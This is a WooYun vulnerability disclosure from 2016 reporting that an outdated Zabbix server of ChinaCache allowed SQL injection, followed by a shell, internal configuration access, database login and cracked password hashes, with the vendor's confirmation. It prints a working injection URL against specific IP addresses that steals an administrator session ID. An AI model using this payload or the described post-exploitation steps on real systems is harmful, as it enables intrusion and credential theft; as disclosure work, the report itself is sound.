当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0210253

漏洞标题:ChinaCache某CDN节点getshell危及内网安全

相关厂商:ChinaCache

漏洞作者: sanwenkit

提交时间:2016-05-18 20:44

修复时间:2016-07-04 17:40

公开时间:2016-07-04 17:40

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-18: 细节已通知厂商并且等待厂商处理中
2016-05-20: 厂商已经确认,细节仅向厂商公开
2016-05-30: 细节向核心白帽子及相关领域专家公开
2016-06-09: 细节向普通白帽子公开
2016-06-19: 细节向实习白帽子公开
2016-07-04: 细节向公众公开

简要描述:

Smart Geek

详细说明:

某主机zabbix版本太老,存在zabbix前台注入

58.220.27.205/zabbix/


58.220.27.200/zabbix/


利用注入获取cookie id:

http://58.220.27.205/zabbix/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28sessionid,0x7e,userid,0x7e,status%29%20as%20char%29,0x7e%29%29%20from%20zabbix.sessions%20where%20status=0%20and%20userid=1%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29


QQ图片20160518193736.png


反弹shell后发现该主机8080端口运行了一套流量日志搜集系统

QQ图片20160518194145.png


漏洞证明:

翻了翻配置文件,各种内网访问:

QQ图片20160518194114.png


连接mysql测试一下,顺便想看看CDN节点的系统是怎么样的。

QQ图片20160518194351.png


密码是MD5,随便解密了一个登陆系统看了下界面:

QQ图片20160518183716.jpg


QQ图片20160518192900.png


QQ图片20160518192930.jpg


QQ图片20160518172436.png


就这样吧,满足了我看界面的心愿。

修复方案:

O(∩_∩)O~

版权声明:转载请注明来源 sanwenkit@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-05-20 17:34

厂商回复:

感谢白帽子帮忙检测,此系统并非归属CDN,一个新开发的衍生产品,但具有一定影响。

最新状态:

暂无